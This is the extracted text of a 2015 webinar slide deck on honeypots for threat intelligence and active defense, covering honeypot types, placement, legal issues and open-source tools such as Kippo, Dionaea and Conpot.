Post on 27-May-2015
description
Threat Intelligence from Honeypots for Active Defense
2
Today’s Presenters
Ioannis KoniarisInformation Security Engineer and Researcher
Ken WestinSecurity Researcher, Tripwire
3
If you know your enemies and know yourself, you will not be imperiled in a hundred battles.
— Sun Tzu, The Art of War
4
Know Yourself: Vulnerability Centered
• Strong focus on prevention
• Signature based detection
• Business context of assets
• Threats are viewed equally without context
• Minimal ability to detect unknown threats
5
• Understands prevention fails (eventually)
• Focus on collection and observation
• Every attack makes you stronger
• Understand threats use different TTP (Tools, Tactics & Procedures)
• Leverages wide range of data sources
• Detection based on more than signatures
Know Your Enemies: Threat Centered
APT
Script Kiddie
Hacktivist
Criminal Syndicate
Bots
6
APT
Script Kiddie
Hacktivist
Criminal Syndicate
Bots
7
Space I can recover. Time, never.
— Napoleon Bonaparte
8
Hacking is a Business Too: Reduce Their ROI
9
Hacking Back: Proactive Intelligence with Honeypots for Active Defense
Ioannis Koniaris, GCIH, GSNA, eCPPT, eMAPT
10
About me
● Started studying honeypots for academic purposes (thesis, IEEE papers)
● Member of the Honeynet Project (non-profit)● Maintainer of BruteForce Lab (http://bruteforce.gr) →
open source honeypots projects for ~3 years● Tools: HoneyDrive, Kippo-Graph, Honeyd-Viz, various
others tools and contributions● Always interested in collaboration for new tools and
research!
11
Introduction to honeypots
● Definition:“An information system resource whose value lies in unauthorized or illicit use of that resource” (Lance Spitzner)
● It’s a system with no production value● There is no reason for a legitimate user to use it or
interact with it
12
Introduction to honeypots
● Any communication attempt is automatically considered malicious
● A honeypot that tries to connect to another system is probably compromised
● They are both deceit tools and traps● Attackers waste time while their actions are monitored
closely
13
Introduction to honeypots
● They cannot prevent attacks against the network by themselves
● But, they can help in the detection phase of an attack and identify the methods of exploiting
● They can be used in conjunction with firewalls and IDSes and in fact support them really nicely as they “patch” their weaknesses
14
Emulation of OSes and Services
● OS emulation is done using “fingerprints”● 8 parameters of the TCP/IP stack are not fixed – 67
bit signature● The same way that various tools identify the remote
OS, e.g. nmap, p0f, etc● Service emulation is done using scripts with identical
behavior and output as the real services
15
Honeypot classifications
● Honeypots can be divided into categories based on two criteria:o The purpose of honeypot deploymento The level of allowed interaction with the honeypot
● Honeypot categories based on purpose:o Production honeypotso Research honeypots
16
Honeypot classifications
● Production honeypots are placed alongside the real systems of a business, acting as decoys
● Ideally they are mirrors of real servers where attackers will waste their time while we are gathering intelligence
● Research honeypots monitor attack activities and capture malicious traffic and files to enhance our knowledge of attack vectors
17
Honeypot classifications
● Honeypot categories based on the level of allowed interaction:o Low-interaction honeypotso Medium-interaction honeypotso High-interaction honeypots
● Low-interaction honeypots offer little to no interaction between the server and the attacker
● It’s only software emulating one or more services – low added risk but limited data
18
Honeypot classifications
● Medium-interaction honeypots offer greater interaction between the system and the attacker
● The emulated network services respond to the attacker and allow access to fake resources (e.g. a fake FTP server)
● Can be used to catch malware as well by emulating specific vulnerabilities in a service
● Medium added risk but generally good results and data!
19
Honeypot classifications
● High-interaction honeypots are real vulnerable OSes given to attackers as sacrificial lambs
● Intruders will have real access and control of the system● Usually used to capture attacks against specific services
or targets fitting a specific profile● High risk and high reward! ● Greatest level of data capture, BUT they must be
isolated and monitored at all times! (pivoting)
20
Honeypot placement & operation
● Mainly 3 common honeypot placement spots:o Externally, in front of the firewall, facing the Interneto Internally, behind the firewallo Demilitarized Zone (DMZ)
● External placement is used to immediately make them available to attackers for intrusion and takeover (most suitable for research honeypots)
21
Honeypot placement & operation
● Internal placement is most suitable to detect attackers (human or software) that have breached the perimeter
● Effective early warning system● High added risk to the network if using a high-
interaction honeypot and it gets taken over – egress firewall needed
22
Honeypot placement & operation
● DMZ placement is the best choice for a business/organization
● Honeypots and other DMZ hosts share the same subnet
● Can be setup as mirrors of real systems in order to catch early attacks against the DMZ
23
Other honeypot technologies
● Honeytokens are objects with no production value placed in a system as an intrusion detection mechanism
● Various small electronic baits that no legitimate user should access – e.g. fake admin account user/pass combination
● If a honeytoken is found in the application’s logs, the system has been compromised
24
Other honeypot technologies
● Honeypages are fake web pages inside a real web app, with no production value
● There is no direct link to them, every request is considered malicious
● A request can come from automated scanning, robots.txt analysis, etc – honeypages log every info they can get
25
Other honeypot technologies
● Attackers nowadays target client programs (browsers, media players, file viewers etc)
● A client honeypot actively tries to find malicious websites serving exploits targeting client applications
● They usually use HTTP, and emulate various web technologies like JavaScript, Active-X, etc acting like a browser
● Thug: modern Python honeyclient (Thug-Vagrant)
26
The value of honeypots
● They give almost no false positiveso Honeypots have no production value and any
interaction can be automatically considered malicious and a candidate for further analysis
● They help us detect malicious actions early ono Sysadmins can use them to quickly classify the
nature and severity of attacks
27
The value of honeypots
● New and unknown attacks can be logged and identified as malicious as fast as common attackso Tools like Honeycomb can create IDS rules o Files or content generated (e.g. IRC logs) by
attackers are saved for further analysis● Add an extra layer of protection, for example when
they are placed internally in order to catch insider threats or warn sysadmins for malware
28
Honeypot advantages
● Simplicity of their idea● They provide a small amount of captured data of high
value● Low requirements in terms of hardware● Can be effective in crypto environments (where IDSes
might have problems) or IPv6 networks
29
Honeypot disadvantages
● No real value if nobody attacks them! ● Limited attack detection radius/scope● Compromised HI honeypots can be used as platforms
to launch further attacks (pivots)● Honeypots can sometimes taunt attackers● Bugs or vulnerabilities can exist in the honeypots
themselves● Placing honeypots increases the overall complexity of
a network – not good from a security standpoint
30
Legal issues
● Disclaimer: IANAL● Different legislations across the world, different laws
concerning the acquisition and storage of data● No definite answer can be given, even though all top
honeypot researchers agree that we are on the safe side!
31
Legal issues
● Privacy:o Essentially the question: “how much data can an
admin gather and store before a privacy problem arises?”
o Is it legal for an admin to capture data from other company employees? What about external threats in general?
32
Legal issues
● Privacy (cont.):o According to Lance Spitzner: The people breaking
into these systems are NOT AUTHORIZED to use them, and if they place any files on them, they have given up their privacy rights to that data
33
Legal issues
● Privacy (cont.):o By using honeypots for communication, malicious
actors have given up their right to privacy, as honeypots are not service providers and are not bound by privacy requirements designed for service providers
34
Legal issues
● Entrapment: A person is 'entrapped' when he is induced or persuaded by law enforcement officers or their agents to commit a crime that he had no previous intent to commito Setting up honeypots cannot be considered an
entrapment activity because honeypots do not induce or persuade anyone, neither promote malicious activity by themselves, attackers find and attack them on their own
35
Legal issues
● Liability:o Hypothetical scenario: a honeypot of company X is
compromised by an attacker and is used as the source of attacks against the network of company Y. Who’s to blame???
o No definite answer in this case, BUT we should also have mitigated this risk in the first place! (firewalls, egress filtering, etc)
36
Threat Intelligence gathering
● The Honeynet Project (in cooperation with the University of Aachen) published the first “public” live map of attacks: http://map.honeynet.org
37
38
Threat Intelligence gathering
● HoneyDrive: a self-contained Honeypot Linux distribution: http://bruteforce.gr/honeydrive
● It contains more than 10 honeypot systems preinstalled and preconfigured to work out of the box, plus ~90 other tools
● Some honeypots can be cumbersome to install and configure properly
● Created mainly to be a straightforward medium to quickly test and deploy different honeypots
39
Threat Intelligence: SSH attacks
● Kippo SSH honeypot: https://github.com/desaster/kippo
● Medium interaction, written in Python (Twisted)● Logs entire shell sessions (UML compatible)● Stores all files downloaded by attackers● Emulates a Debian OS● You can add fake files and content● You can add fake command output
40
Threat Intelligence: SSH attacks
● Kippo-Graph is a visualization tool for Kippo: http://bruteforce.gr/kippo-graph
41
Threat Intelligence: SSH attacks
● Kippo fork with ElasticSearch support: https://github.com/ikoniaris/kippo
42
Threat Intelligence: malware attacks
● Dionaea is a malware honeypot: http://dionaea.carnivore.it/
● The successor of Nepenthes● Written in C/Python, emulates protocols● SMB, HTTP(S), (T)FTP, MSSQL, MySQL, SIP● Uses libemu to detect and analyze shellcodes● Shellcode runs inside a libemu VM and API calls get
recorded
43
Threat Intelligence: malware attacks
● DionaeaFR is a front end for Dionaea: http://rubenespadas.github.io/DionaeaFR/
44
Threat Intelligence: web attacks
● Glastopf is a web honeypot that emulates thousands of vulnerabilities “types” to catch web attacks (vs vuln emulation): http://glastopf.org/
● Wordpot is a Wordpress honeypot: http://brindi.si/g/projects/wordpot.html
45
Threat Intelligence: SCADA attacks
● Conpot is an ICS honeypot to collect intelligence about motives and methods of adversaries targeting industrial control systems: http://conpot.org/
● ModBus emulation and specific widely used SCADA devices
● HMIs and new devices can be added by interested parties
46
Threat Intelligence: network sim
● Honeyd creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and have a “personality”: http://www.honeyd.org/
● Can emulate entire network/system topologies● Honeyd2MySQL transfers honeyd logs to a MySQL
DB: http://bruteforce.gr/honeyd2mysql● Honeyd-Viz is a visualization tool for Honeyd:
http://bruteforce.gr/honeyd-viz
47
Threat Intelligence: active defence
● ADHD is distro containing various active defense tools: http://sourceforge.net/projects/adhd/
● It contains tools like:● Artillery and Bear Trap for blacklisting attackers● Decloak and Honey Badger to unmask attackers ● Spidertrap and Weblabyrinth to trap malicious web
scanners in endless loops
48
Threat Intelligence: active IDS
● Beeswarm is an active IDS project: https://github.com/honeynet/beeswarm
● It provides easy configuration, deployment and management of honeypots and clients
● The system lures attackers into the honeypots by setting up drones who communicate with honeypots and intentionally leak credentials (honeytokens)
49
Threat Intelligence: active IDS
50
Threat Intelligence: other tools
● Modern Honey Network is a solution for managing and deploying common honeypot sensors: http://threatstream.github.io/mhn/
● Combine gathers threat intel from public feeds: https://github.com/mlsecproject/combine
● ArcReactor monitors public sources for OSINT data and sends them to a SIEM: http://deadbits.org/projects/arcreactor/
51
Conclusions
● Honeypots still present a unique concept● They are more useful than ever in the current
landscape of global attacks● Tools and utilities exist to easily deploy sensors and
gather intelligence that matters to *you*● Much activity in the field by organizations (e.g.
Honeynet Project) and individual researchers● Give them a try!
52
Contact me
● BruteForce Lab: http://bruteforce.gr● Email: ikoniaris@gmail.com● Twitter: @ikoniaris
53
Thank you